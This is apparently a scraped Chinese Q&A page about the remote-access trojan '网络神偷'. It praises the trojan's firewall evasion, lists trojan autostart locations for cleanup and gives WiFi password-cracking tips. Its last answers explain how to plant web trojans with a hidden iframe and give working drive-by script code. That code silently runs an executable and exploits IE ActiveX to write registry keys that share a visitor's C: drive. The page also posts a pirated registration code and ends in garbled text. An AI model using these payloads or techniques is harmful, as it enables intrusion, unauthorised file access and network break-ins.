网页神偷
❶ 网络神偷的软件原理
a.“反弹端口原理”简介:
如果对方装有防火墙,客户端发往服务端的连接首先会被服务端主机上的防火墙拦截,使服务端程序不能收到连接,软件不能正常工作。同样,局域网内通过代理上网的电脑,因为是多台共用代理服务器的IP地址,而本机没有独立的互联网的IP地址(只有局域网的IP地址),所以也不能正常使用。就是说传统型的同类软件不能访问装有防火墙和在局域网内部的服务端主机。
但往往是道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相反,反弹端口型软件的服务端(被控制端)主动连接客户端(控制端),为了隐蔽起见,客户端的监听端口一般开在80(提供HTTP服务的端口),这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似 TCPUserIP:1026ControllerIP:80 ESTABLISHED 的情况,稍微疏忽一点你就会以为是自己在浏览网页(防火墙也会这么认为的)。看到这里,有人会问:既然不能直接与服务端通信,那如何告诉服务端何时开始连接自己呢?答案是:通过主页空间上的文件实现的,当客户端想与服务端建立连接时,它首先登录到FTP服务器,写主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让自己开始连接时,就主动连接,如此就可完成连接工作。
本软件用的就是这种“反弹端口”原理,可以穿过防火墙,甚至还能访问局域网内部的电脑。据作者所知,在同类软件中,本软件是唯一使用这种方法的,祝贺你!你幸运的选择了它。
b.“HTTP隧道技术”简介:
简单的来说,就是把所有要传送的数据全部封装到 HTTP 协议里进行传送,就可以通过 HTTP、SOCKS4/5 代理,而且也不会有什么防火墙会拦截。
我们都知道其它木马只能访问拨号上网的服务端,而因为网络神偷使用了“反弹端口原理”所以它不仅能访问拨号上网的服务端,更可以访问局域网里通过 NAT 代理(透明代理)上网的服务端。而使用“HTTP隧道技术”以后,它甚至可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的服务端。这样, 就几乎支持了所有的上网方式,也就是说“只要能浏览网页的电脑,网络神偷都能访问!”。
服务端支持以下上网方式:
拨号上网
ISDN
ADSL
DDN
Cable Modem
NAT透明代理
HTTP的GET型代理
HTTP的CONNECT型代理
SOCKS4 代理
SOCKS4A 代理
SOCKS5 代理
在上述上网方式下,均可正常工作。 互联网如此之大,覆盖全球,我们如何标识并找到上面的任何一台电脑呢?答案是:IP地址,每台连网电脑都会被分配一个IP地址,这个IP地址是全球唯一的,就象你家的门牌号码,别人可以根据这个找到你。同样,IP地址分配是有规律的,可以根据IP地址分配表查出相应的地理位置(本软件内置IP地址分配表)。大多数互联网用户是拨号上网的,拨号上网的IP地址是由ISP(互联网接入服务提供商,例如163、169)动态分配的。两台电脑想要连接就必须要知道对方的IP地址,就象想去你家串门就必须知道你的住址。因此,服务端如何把自己的IP地址告诉客户端就成了一个大问题,也就是服务端上线通知。现在最常用的方法是Email通知,即服务端上网后,发送自己的IP地址到事先指定的邮箱,客户端使用者只要去收信就行了。这种方面虽然最常用,但有很大不足,首先Email的实时性得不到保证,时慢时快,这与发信服务器的线路质量有很大关系。其次,越来越多的发信服务器设了“发信认证”功能,发信也要邮箱的密码(原来只有收信才要),这就给服务端发信增加了困难,服务端不带密码无法发送,带密码则有可能被别人破出来。本软件用的是另一种更先进的方法:UDP通知,客户端上网后,会将自己的IP地址写到主页空间的指定文件里,服务端定期读取这个文件的内容,就可得到客户端的IP地址,并将自己的一些其它信息(主机名、IP地址、上线时间等等)用UDP协议发送给客户端。客户端接收后,将数据解释并显示在“服务端在线列表”里,服务端情况一目了然。可能有人会担心:主页空间上的文件谁都可以访问(就象浏览网页),自己的IP地址会不会让别人看到?这个问题作者当然已经想到,所有可能被别人看到的数据(包括主页空间上的)都已经加密了,就算别人拿到了也没用。而且数据加密密码是由用户自行设置的,就连软件作者也无法破解。
网络神偷还有运用了“HTTP 隧道技术”的服务端上线通知功能,即如果服务端是通过 HTTP、SOCKS4/5代理上网的,无法再使用 UDP 上线通知方法,它就会自动使用“HTTP 隧道技术”的上线通知方法:先用“HTTP 隧道技术”与客户端建立一条 TCP 连接,以后每分钟再通过此连接向客户端发送上线通知数据。(“HTTP 隧道”主机的图标与普通主机不同,图标前面增加了一个金黄色的小管道)
❷ 网络神偷 7.0 正式版
有7。4版本的了。
网络神偷是一个专业级的远程文件访问工具,具有以下特点:
1.针对磁盘文件系统:本软件针对远程文件访问,而不是远程控制,力求“专而精”。并高度模枋 Windows 资源管理器,简单易用,我们的目标是使访问远程驱动器就象访问本地的一样方便。
2.强大的文件操作功能:可对本地及远程驱动器进行:新建文件、新建文件夹、查找文件、剪切、复制、粘贴(包括:本地文件操作、上传、下载、同远程主机的文件复制与移动)、本地运行、远程运行、重命名、删除、查看、修改驱动器属性、修改文件属性等操作,支持断点续传,并且所有操作均支持多选及文件夹操作。
3.运用了“反弹端口原理”与“HTTP 隧道技术”:
“反弹端口原理”:
由服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,并且可以穿过防火墙(包括:包过滤型及代理型防火墙)。
“HTTP隧道技术”:
把所有要传送的数据全部封装到 HTTP 协议里进行传送,因此在互联网上可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的电脑,而且也不会有什么防火墙会拦截。
所以,本软件支持所有的上网方式,既“只要能浏览网页的电脑,网络神偷都能访问!”。本软件可以访问以下上网方式的电脑:拨号上网、ISDN、ADSL、DDN、Cable Modem、NAT 透明代理、HTTP 的 GET 型代理、HTTP 的 CONNECT 型代理、SOCKS4 代理、SOCKS4A 代理、SOCKS5 代理。
4.先进的服务端上线通知功能:服务端通过 UDP 协议发消息给客户端,在“服务端在线列表”里可以看到服务端的主机名、互联网的IP地址、局域网的IP地址、地址位置、上线时间、在线时长,所有信息一目了然,实时性高、安全可靠,是 Email 通知方式所不能比的。而且还有运用了“HTTP 隧道技术”的服务端上线通知功能。
5.所有公开的数据均用 RSA 数据加密。
注:软件使用前,使用者需提供一个主页空间供它使用,主页空间申请方法请看 Readme.txt。
❸ 如何消除网页中的木马急!急!急!
木马杀客 5.1 绿色特别版(病毒库已更新到12月03)
http://www.51ct.cn/downinfo/97.html
可以升级的.免费的!
最新的了.杀你的木马应该没问题!
木马就用Ewido3.5纯绿色版:http://www.orsoon.com/Software/catalog184/2727.html
注册码: 6617-EBE8-D1FD-FEA2
"输入注册码后接着关掉自动更新,每次升级后得再次输入注册码"
(木马克星在他面前小儿科罢了,你再去下载一个木马杀
客,中木马时,两个合起来一起杀)
“(正常模式下无法清楚的病毒,进入安全模式试一下!!!)”
木马,又名特洛伊木马(Trojan),其名称取自古希腊神话的特洛伊木马记,它是一种基于远程控制的黑客工具,具有很强的隐蔽性和危害性。为了达到控制服务端主机的目的,木马往往要采用各种手段达到激活自己、加载运行的目的。让我们一起来看看木马常用的激活方式。
在Win.ini中启动
在Win.ini的[windows]字段中有启动命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果后面跟着程序,比如: run=c:windowsfile.exe load=c:windowsfile.exe
这个file.exe很可能就是木马程序!
修改文件关联
修改文件关联是木马们常用手段(主要是国产木马,老外的木马大都没有这个功能),比方说正常情况下TXT文件的打开方式为Notepad.exe文件,但一旦中了文件关联木马,则TXT文件打开方式就会被修改为用木马程序打开,如著名的国产木马冰河。
“冰河”就是通过修改HKEY_CLASSES_ROOTtxtfileshellopencommand下的键值,将“C:WINDOWSNOTEPAD.EXE%1”改为“C:WINDOWSSYSTEMSYSEXPLR.EXE%1”,这样当你双击一个TXT文件,原本应用Notepad打开该文件的,现在却变成启动木马程序了,好狠毒哦!请大家注意,不仅仅是TXT文件,其他诸如HTM、EXE、ZIP、COM等都是木马的目标,要小心喽。对付这类木马,只能经常检查HKEY_CLASSES_ROOT文件类型shellopencommand主键,查看其键值是否正常。
捆绑文件
实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起,上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马。
在System.ini中启动
System.ini位于Windows的安装目录下,其[boot]字段的shell=Explorer.exe是木马喜欢的隐蔽加载之所,木马通常的做法是将该句变为这样:shell=Explorer.exefile.exe,注意这里的file.exe就是木马服务端程序!
揪出隐藏的“木马”(2)
另外,在System.ini中的[386Enh]字段,要注意检查在此段内的“driver=路径程序名”,这里也有可能被木马所利用。
再有,在System.ini中的[mic]、[drivers]、[drivers32]这三个字段,它们起到加载驱动程序的作用,但也是添加木马程序的好场所。
利用注册表加载运行
如下所示的注册表位置都是木马喜好的藏身之处,赶快检查一下,有什么程序在其下:
HKEY_LOCAL_下所有以“run”开头的键值;
HKEY_CURRENT_下所有以“run”开头的键值;
HKEY_USERS.DefaultSoftware
下所有以“run”开头的键值。
在Autoexec.bat和Config.sys中加载运行
请大家注意,在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后,将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行,而且采用这种方式不是很隐蔽,容易被发现。所以在Autoexec.bat和Config.sys中加载木马程序的并不多见,但也不能因此而掉以轻心。
在Winstart.bat中启动
Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件,它也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按[F8]键再选择逐步跟踪启动过程的启动方式得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成,因此木马完全可以像在Autoexec.bat中那样被加载运行。
“反弹端口”型木马的主动连接方式
什么叫“反弹端口”型木马呢?作者经过分析防火墙的特性后发现:大多数的防火墙对于由外面连入本机的连接往往会进行非常严格的过滤,但是对于由本机发出的连接却疏于防范(当然有的防火墙两方面都很严格)。于是,与一般的木马相反,“反弹端口”型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,当要建立连接时,由客户端通过FTP主页空间告诉服务端:“现在开始连接我吧!”,并进入监听状态,服务端收到通知后,就会开始连接客户端。为了隐蔽起见,客户端的监听端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似“TCP 服务端的IP地址:1026,客户端的IP地址:80ESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页。防火墙也会如此认为,大概没有哪个防火墙会不给用户向外连接80端口吧。这类木马的典型代表就是“网络神偷”。由于这类木马仍然要在注册表中建立键值,因此只要留意注册表的变化就不难查到它们。
尽管木马很狡猾,善于伪装和隐藏自己,达到其不可告人的目的。但是,只要我们摸清规律,掌握一定的方法,还是能够防范的。消除对木马的恐惧感和神秘感。其实,只要你能加倍小心,加强防范,相信木马将会离你远去。
❹ wifi神偷好用吗,能暴力破解wifi吗。
wifi神偷还好吧,能破解的,但那是关于破解WIFI密码有以下几点:
1,不要想用安卓,IOS手机破解密码。
2,不要用微软系统破解密码。当然手机确实可以的,微软也可以,但是效率就是搞不起来。手机速度慢,不要说。微软系统有个小WEP破解的,但是WPA2也没有一个像样破解的。
3、破解系统最好就是XIAOPANOS ,CDLINUX,BT4,BEINI系统;如果是WEP,别的不要说。BT3最经典了,但是多密钥的WEP,BT3也搞不定的。WPA,WPA2,用就是XIAOPAN ,CDLINUX,BT4,BEINI了。但是如果有客户端可以抓包,但是要等它打开网页的瞬间抓到包之后跑字典。
4、如果路由器自动开启WPS,的可以PIN出8个数字,用QSS软件或者同类软件登陆破解,只要是密码对,也不需要输入搜搜无线账户的,它自动的。
5、字典可以用生成器制作,什么软件都可以,最主要的就是要大。8位0到9的数字就要1个G的,如果组合字母,特殊符号,会10几个G都是小菜的,破解密码不是一天学会的而且学习理论,付诸实践,综合经验,最终可以破解的。而且将来的破解时间会提快,破解的密码也就越多,能破解遇到的困难也就越多。
❺ 怎么做网页木马
用Best超级网马集成器(网络自己搜,别人给连接不安全)
生成相应漏洞的网马就可以了
在网页中插入这样一句话:<iframe src="生成的木马地址" width=0 height=0> 就可以了
❻ 网络神偷是一个木马,还有其他什么说明吗
网络神偷是一个专业级的远程文件访问工具,具有以下特点:
1.针对磁盘文件系统:本软件针对远程文件访问,而不是远程控制,力求“专而精”。并高度模枋 Windows 资源管理器,简单易用,我们的目标是使访问远程驱动器就象访问本地的一样方便。
2.强大的文件操作功能:可对本地及远程驱动器进行:新建文件、新建文件夹、查找文件、剪切、复制、粘贴(包括:本地文件操作、上传、下载、同远程主机的文件复制与移动)、本地运行、远程运行、重命名、删除、查看、修改驱动器属性、修改文件属性等操作,支持断点续传,并且所有操作均支持多选及文件夹操作。
3.运用了“反弹端口原理”与“HTTP 隧道技术”:
“反弹端口原理”:
由服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,并且可以穿过防火墙(包括:包过滤型及代理型防火墙)。
“HTTP隧道技术”:
把所有要传送的数据全部封装到 HTTP 协议里进行传送,因此在互联网上可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的电脑,而且也不会有什么防火墙会拦截。
所以,本软件支持所有的上网方式,既“只要能浏览网页的电脑,网络神偷都能访问!”。本软件可以访问以下上网方式的电脑:拨号上网、ISDN、ADSL、DDN、Cable Modem、NAT 透明代理、HTTP 的 GET 型代理、HTTP 的 CONNECT 型代理、SOCKS4 代理、SOCKS4A 代理、SOCKS5 代理。
4.先进的服务端上线通知功能:服务端通过 UDP 协议发消息给客户端,在“服务端在线列表”里可以看到服务端的主机名、互联网的IP地址、局域网的IP地址、地址位置、上线时间、在线时长,所有信息一目了然,实时性高、安全可靠,是 Email 通知方式所不能比的。而且还有运用了“HTTP 隧道技术”的服务端上线通知功能。
5.所有公开的数据均用 RSA 数据加密。
注:软件使用前,使用者需提供一个主页空间供它使用,主页空间申请方法请看 Readme.txt。
❼ 求一密室逃脱网页上的小游戏
1. circus马戏团 2. 罪案现场29逃离屠场 3. 奇妙的房子
4. 淡绿色的房间 5. 罪案现场27拆弹专家 6. 休息厅逃脱
7. 进入老屋 8. 逃离房间_德国版 9. 节水之家
10. 大熊猫找竹子 11. 走出Office 12. 逃离房间-军事型
13. 逃离家门 14. ET刽子手房间 15. 逃离密室.水篇
16. 古墓逃跑 17. 逃出旅馆 18. 水井逃生
19. 逃离密室 20. 奇异地道 21. 猫猫密室脱逃
22. maama(密室游戏) 23. 逃离监狱 24. 罪案现场28五个房间
25. 逃到小岛 26. 罪案现场31神偷谍影 27. 寂静之门
28. 监狱逃脱 29. 木偶战记脱狱 30. 你能走出这个房间吗
31. 罪案现场32DVD的故事 32. 我要上厕所 33. 逃离房间_韩国版
34. 逃离房间 35. 螃蟹命案 36. 灰白色的房间
37. 罪案现场32DVD的故事(1) 38. 卧室逃离 39. 逃离车库
❽ 为什么神偷显示网络故障,明明有网
看看局域网的设置里有没有勾选为Lan使用代理服务器,那个不能选
检查版你的网络链接可能是你权网络的不稳定,网速慢导致的网页打不开的
垃圾缓存过多长时间浏览网页导致的垃圾缓存过多,从而无法浏览网页的,你可以打开腾讯电脑管家,工具箱里有清理垃圾功能,清理下垃圾
如果是IE问题,可以用腾讯电脑管家,电脑诊所一上网异常一IE修复下就可以了
❾ 如何使用网络神偷
网络神偷是一个专业级的远程文件访问工具,具有以下特点:
1.针对磁盘文件系统:本软件针对远程文件访问,而不是远程控制,力求“专而精”。并高度模枋 Windows 资源管理器,简单易用,我们的目标是使访问远程驱动器就象访问本地的一样方便。
2.强大的文件操作功能:可对本地及远程驱动器进行:新建文件、新建文件夹、查找文件、剪切、复制、粘贴(包括:本地文件操作、上传、下载、同远程主机的文件复制与移动)、本地运行、远程运行、重命名、删除、查看、修改驱动器属性、修改文件属性等操作,支持断点续传,并且所有操作均支持多选及文件夹操作。
3.运用了“反弹端口原理”与“HTTP 隧道技术”:
“反弹端口原理”:
由服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,并且可以穿过防火墙(包括:包过滤型及代理型防火墙)。
“HTTP隧道技术”:
把所有要传送的数据全部封装到 HTTP 协议里进行传送,因此在互联网上可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的电脑,而且也不会有什么防火墙会拦截。
所以,本软件支持所有的上网方式,既“只要能浏览网页的电脑,网络神偷都能访问!”。本软件可以访问以下上网方式的电脑:拨号上网、ISDN、ADSL、DDN、Cable Modem、NAT 透明代理、HTTP 的 GET 型代理、HTTP 的 CONNECT 型代理、SOCKS4 代理、SOCKS4A 代理、SOCKS5 代理。
4.先进的服务端上线通知功能:服务端通过 UDP 协议发消息给客户端,在“服务端在线列表”里可以看到服务端的主机名、互联网的IP地址、局域网的IP地址、地址位置、上线时间、在线时长,所有信息一目了然,实时性高、安全可靠,是 Email 通知方式所不能比的。而且还有运用了“HTTP 隧道技术”的服务端上线通知功能。
5.所有公开的数据均用 RSA 数据加密。
注:软件使用前,使用者需提供一个主页空间供它使用,主页空间申请方法请看 Readme.txt。
❿ 如何给网页上放木马
转载:
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://dhj.126.com连接目标地址里...褪枪蚕砹